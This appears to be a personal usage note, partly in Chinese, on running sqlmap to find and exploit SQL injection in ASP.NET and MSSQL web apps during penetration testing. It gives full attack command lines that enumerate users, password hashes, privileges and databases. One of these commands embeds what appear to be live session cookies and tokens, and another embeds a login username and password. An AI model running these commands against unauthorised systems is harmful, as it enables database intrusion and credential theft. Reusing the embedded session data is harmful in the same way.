sqlmap

https://github.com/sqlmapproject/sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

 

http://sqlmap.org/

测试用例

http://localhost:8086/project/controller/action (POST) # C:\Users\clu\Downloads\sqlmapproject-sqlmap-d4d83b2\sqlmap.py -u http://localhost:8086/project/controller/action --data=search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30

%userprofile%\AppData\Local\sqlmap\output\localhost

 

 .\sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=D9DB90E84FE929C84DB3C85E98AE621C5866E18BC145A78037513899550B3CA1039C2E89B3B8FED91E2EBFD0FB210E156C14C94C1E03112CCA2A81F5923D7421A7DF72E09A6551AA3485B380362E69ABA5B025EEA6AB8AFA712D19859EF6C2654C61C14F17A09F87F330BAC4D0440C87E74E778EF6E3D6D00E54CCE964C8B83995287D2CBA4576422C7FAD7B2C3D61A2CE47064FFCE860C8C589EA9E3F3994FDDB9F49C889E9A4380A57C6C2022503A54F15A98705F1F0A9DDC51795CDF614558C9C9D7D29085F27143F78D3EB8F3BC220DBA41BC257BFC941413B16DBA2A015318417A4F9261C105DE0703176DB969D48D89FC3C945258E415AAD9CB927EFB43B88F37DF0ACA143423F0B22CB6804E5931466F243A939474B3EA80AE7EF32959106A5B062C62C5FB26E63F8; EdenredParticipantSite=711332B299FB9664209A49D30D437D637D5A4E181980464C896E36530CE845C19F8E3CACAD91DCC386385050164D33AD9E74F6195D91A210291F260AC5371BD831B6094C7B5723858FB8FE4654DB793C25835355593FDE328D4F6E35192FE58742E85A29B669175C8B7FC4DB1252E75FD43EA254EBBA26CEACC1EFAB8CBCC18E83CB48B80FDE3B22DA3D3B369E49F6C5BBF2D8D36CDA2D9A1258CF6DB6C43049883F88992C07EF2B51D56E95E670FB878FE8F77DAF0E21BD45B668D28563A1669234602C188290EF6187D3AC99BFCA92ADFDCE86226F4443D7DDEFA1C46B4D4373DA392837D7CE27C630008303D1E50665E689B8C4D2DE4402D051C7CB5A06320185FAF86A85AAB05B1BA1EDCBEAF45D7974610C3D3E9DC388C600238B56E2324AC274C9E315F3004CA2C08F3CEA38538FE34435" --delay=0 --timeout=30 -retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"

 

参数说明

https://github.com/sqlmapproject/sqlmap/wiki/Usage

-u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")

--data=DATA         Data string to be sent through POST (e.g. "id=1")

--cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")

--delay=DELAY       Delay in seconds between each HTTP request

--timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)

--retries=RETRIES   Retries when the connection timeouts (default 3)

-p TESTPARAMETER    Testable parameter(s)

--dbms=DBMS         Force back-end DBMS to provided value

-os=OS             Force back-end DBMS operating system to provided value

--level=LEVEL       Level of tests to perform (1-5, default 1)
--risk=RISK         Risk of tests to perform (1-3, default 1)

--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

--time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)

Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

-b, --banner        Retrieve DBMS banner

--current-user      Retrieve DBMS current user

--current-db        Retrieve DBMS current database

--hostname          Retrieve DBMS server hostname

--is-dba            Detect if the DBMS current user is DBA

--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes

--privileges        Enumerate DBMS users privileges

--roles             Enumerate DBMS users roles
--dbs               Enumerate DBMS databases

General:
    These options can be used to set some general working parameters

--batch             Never ask for user input, use the default behavior

--answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")

 

python.exe .\sqlmap.py -u "url" -f --banner --dbs --users

you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'

 

How to include multiple parameters in sqlmap POST request

You can just comma-separate the parameters you want to test.

In a GET request:

$ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

In a POST request:

$ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST
...
[13:37:54] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable
...
[13:37:59] [WARNING] heuristic (basic) test shows that POST parameter 'b' might not be injectable
...

Both examples would test the specified parameters a and b, but ignore c. (I also put them into double quotes which isn't actually necessary on Linux.)

 

Using sqlmap to exploit sql injection on ASP.NET and MSSQL 2012 

例子

python sqlmap.py --url="http://172.16.192.177" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&txtUserName=adinanta&txtPWD=p%40ssw0rd&btnSubmit=Submit" -p txtUserName --banner

 

python.exe .\sqlmap.py -u "url" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTAyMzk4NTIwZGQ+200GJqzXan3bvSRe1830yMwO1/5WyLofSgkPPFPCDA==&__VIEWSTATEGENERATOR=AD8ECECA&__EVENTVALIDATION=/wEdAAMGQ3/2wHYEvc5SFKrtaUE7ESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3cCneHHZYQNY/p/VeBR9o5AA9gjGBpbgF+4fPumKT6flA==&TextBox1=30&Button1=查询" --random-agent

[14:20:02] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS 
are you sure that you want to continue with further target testing? [Y/n]

 

作者:Chuck Lu    GitHub